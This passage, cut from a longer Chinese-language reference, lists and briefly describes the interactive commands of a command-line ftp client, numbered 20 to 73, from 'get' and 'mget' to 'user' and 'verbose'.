format:將檔案傳輸方式設定為format,預設為file方式。20。get remote-file[local-file]: 將遠端主機的檔案remote-file傳至本地硬碟的local-file。21。glob:設定mdelete,mget,mput的檔名擴充套件,預設時不擴充套件檔名,同命令行的-g引數。22。hash:每傳輸1024位元組,顯示一個hash符號(#)。23。help[cmd]:顯示ftp內部命令cmd的幫助資訊,如:help get。24。idle[seconds]:將遠端伺服器的休眠計時器設為[seconds]秒。25。image:設定二進位制傳輸方式(同binary)。26。lcd[dir]:將本地工作目錄切換至dir。27。 ls[remote-dir][local-file]:顯示遠端目錄remote-dir, 並存入本地檔案local-file。28。macdef macro-name:定義一個宏,遇到macdef下的空行時,宏定義結束。29。mdelete[remote-file]:刪除遠端主機檔案。30。mdir remote-files local-file:與dir類似,但可指定多個遠端檔案,如 :mdir *。o。*。zipoutfile 。31。mget remote-files:傳輸多個遠端檔案。32。mkdir dir-name:在遠端主機中建一目錄。33。mls remote-file local-file:同nlist,但可指定多個檔名。34。mode[modename]:將檔案傳輸方式設定為modename, 預設為stream方式。35。modtime file-name:顯示遠端主機檔案的最後修改時間。36。mput local-file:將多個檔案傳輸至遠端主機。37。newer file-name: 如果遠端機中file-name的修改時間比本地硬碟同名檔案的時間更近,則重傳該檔案。38。nlist[remote-dir][local-file]:顯示遠端主機目錄的檔案清單,並存入本地硬碟的local-file。39。nmap[inpattern outpattern]:設定檔名對映機制, 使得檔案傳輸時,檔案中的某些字元相互轉換, 如:nmap $1。$2。$3[$1,$2]。[$2,$3],則傳輸檔案a1。a2。a3時,檔名變為a1,a2。 該命令特別適用於遠端主機為非UNIX機的情況。40。ntrans[inchars[outchars]]:設定檔名字元的翻譯機制,如ntrans1R,則檔名LLL將變為RRR。41。open host[port]:建立指定ftp伺服器連線,可指定連線埠。42。passive:進入被動傳輸方式。43。prompt:設定多個檔案傳輸時的互動提示。44。proxy ftp-cmd:在次要控制連線中,執行一條ftp命令, 該命令允許連線兩個ftp伺服器,以在兩個伺服器間傳輸檔案。第一條ftp命令必須為open,以首先建立兩個伺服器間的連線。45。put local-file[remote-file]:將本地檔案local-file傳送至遠端主機。46。pwd:顯示遠端主機的當前工作目錄。47。quit:同bye,退出ftp會話。48。quote arg1,arg2。。。:將引數逐字發至遠端ftp伺服器,如:quote syst。49。recv remote-file[local-file]:同get。50。reget remote-file[local-file]:類似於get, 但若local-file存在,則從上次傳輸中斷處續傳。51。rhelp[cmd-name]:請求獲得遠端主機的幫助。52。rstatus[file-name]:若未指定檔名,則顯示遠端主機的狀態, 否則顯示檔案狀態。53。rename[from][to]:更改遠端主機檔名。54。reset:清除回答佇列。55。restart marker:從指定的標誌marker處,重新開始get或put,如:restart 130。56。rmdir dir-name:刪除遠端主機目錄。57。runique:設定檔名只一性儲存,若檔案存在,則在原檔案後加字尾。1, 。2等。58。send local-file[remote-file]:同put。59。sendport:設定PORT命令的使用。60。site arg1,arg2。。。:將引數作為SITE命令逐字傳送至遠端ftp主機。61。size file-name:顯示遠端主機檔案大小,如:site idle 7200。62。status:顯示當前ftp狀態。63。struct[struct-name]:將檔案傳輸結構設定為struct-name, 預設時使用stream結構。64。sunique:將遠端主機檔名儲存設定為只一(與runique對應)。65。system:顯示遠端主機的作業系統型別。66。tenex:將檔案傳輸型別設定為TENEX機的所需的型別。67。tick:設定傳輸時的位元組計數器。68。trace:設定包跟蹤。69。type[type-name]:設定檔案傳輸型別為type-name,預設為ascii,如:type binary,設定二進位制傳輸方式。70。umask[newmask]:將遠端伺服器的預設umask設定為newmask,如:umask 371。user user-name[password][account]:向遠端主機表明自己的身份,需要口令時,必須輸入口令,如:user anonymous my@email。72。verbose:同命令行的-v引數,即設定詳盡報告方式,ftp 伺服器的所有響 應都將顯示給使用者,預設為on。73。?[cmd]:同help。
